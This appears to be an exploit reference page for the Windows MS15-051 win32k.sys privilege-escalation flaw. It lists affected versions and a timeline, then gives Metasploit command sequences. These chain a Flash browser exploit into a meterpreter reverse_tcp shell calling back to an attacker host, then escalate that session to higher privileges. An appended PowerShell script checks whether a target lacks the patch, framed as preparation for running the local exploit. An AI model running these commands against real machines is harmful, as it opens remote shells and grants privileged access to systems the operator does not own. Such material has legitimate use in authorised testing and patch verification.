Timeline :
Vulnerability discovered being exploited in the wild by FireEye on 2015-04-13
Patch provided by the vendor via MS15-051 on 2015-05-12
PoC provided by hfiref0x on 2015-05-12
Metasploit module provided on 2015-06-03
PoC provided by :
Unknown
hfiref0x
OJ Reeves
Spencer McIntyre
Reference(s) :
Affected version(s) :
Windows Server 2003 Service Pack 2
Windows Vista Service Pack 2
Windows Server 2008 Service Pack 2
Windows 7 Service Pack 1
Tested on :
Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188 (CVE-2015-3105) for remote exploitation
Description :
This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.
Commands :
Remote exploitation :
use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run
sessions -i 1
getuid
background
Local privilege escalation :
use exploit/windows/local/ms15_051_client_copy_image
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445
set SESSION 1
run
getuid
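Before pointing the local module at a session, it is worth checking from the target itself whether the host is one of the builds listed above and whether the MS15-051 update is present. The script below is an added example, not code from the original page or from the Metasploit project. It assumes that MS15-051 was delivered as KB3045171 on these platforms (confirm the KB number against the bulletin for your build), matches the page's affected list plus Windows Server 2008 R2 SP1 (which the module description says it was tested on) on the WMI OS caption and service pack level, and uses Get-WmiObject and Get-HotFix so it also runs on the PowerShell 2.0 hosts in scope.

```powershell
# Added pre-flight check for MS15-051 / ms15_051_client_copy_image targets.
# Not part of the original page or of the Metasploit module.
# Assumption: MS15-051 installs as KB3045171 on the listed platforms.
function Test-MS15051Exposure {
    $os   = Get-WmiObject -Class Win32_OperatingSystem
    $sp   = [int]$os.ServicePackMajorVersion
    $arch = $os.OSArchitecture   # reporting only; the module ships x86 and x64 targets

    # Caption regex + service pack level. The page's list, plus 2008 R2 SP1 from the
    # module description. The negative lookahead keeps plain 2008 from matching R2.
    $affected = @(
        @{ Pattern = 'Windows Server 2003';        SP = 2 },
        @{ Pattern = 'Windows Vista';              SP = 2 },
        @{ Pattern = 'Windows Server 2008(?! R2)'; SP = 2 },
        @{ Pattern = 'Windows Server 2008 R2';     SP = 1 },
        @{ Pattern = 'Windows 7';                  SP = 1 }
    )
    $listed = [bool]($affected | Where-Object {
        $os.Caption -match $_.Pattern -and $sp -eq $_.SP
    })

    # KB presence is the quick signal; the win32k.sys file version is the evidence,
    # since the bug lives in that driver.
    $kb   = Get-HotFix -Id 'KB3045171' -ErrorAction SilentlyContinue
    $w32k = (Get-Item "$env:SystemRoot\System32\win32k.sys").VersionInfo.FileVersion

    New-Object PSObject -Property @{
        Caption        = $os.Caption
        ServicePack    = $sp
        Architecture   = $arch
        ListedAffected = $listed
        KB3045171      = [bool]$kb
        Win32kVersion  = $w32k
        LikelyExposed  = ($listed -and -not $kb)
    }
}

Test-MS15051Exposure | Format-List
```

A missing KB3045171 on a host that has since been serviced by the later monthly rollups is not proof of exposure, because those rollups supersede the individual update without registering its KB; in that case compare the reported win32k.sys version against the version the vendor's bulletin lists for the build before trusting LikelyExposed.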